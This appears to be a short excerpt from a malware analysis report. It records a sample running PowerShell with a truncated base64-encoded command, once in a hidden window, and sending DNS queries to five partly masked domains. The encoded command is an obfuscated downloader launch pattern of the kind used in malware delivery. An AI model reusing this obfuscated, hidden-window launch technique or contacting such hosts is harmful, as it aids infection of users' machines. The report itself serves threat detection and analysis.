Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASABnAHUAaABpAHIAZABqAGoAZgBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFIAeAByAGoAaAB4AHYAcwBsAGUAawBiAGwAIAAjAD4AIAAkAFIAcgBuAGsAcwB6AHQAcAB4AG4APQ...
- DNS ASK ww##d.com
- DNS ASK ai###scuits.com
- DNS ASK na####harters.com
- DNS ASK be####design.com
- DNS ASK de#.##stacomm.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASABnAHUAaABpAHIAZABqAGoAZgBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFIAeAByAGoAaAB4AHYAcwBsAGUAawBiAGwAIAAjAD4AIAAkAFIAcgBuAGsAcwB6AHQAcAB4AG4APQ...' (with hidden window)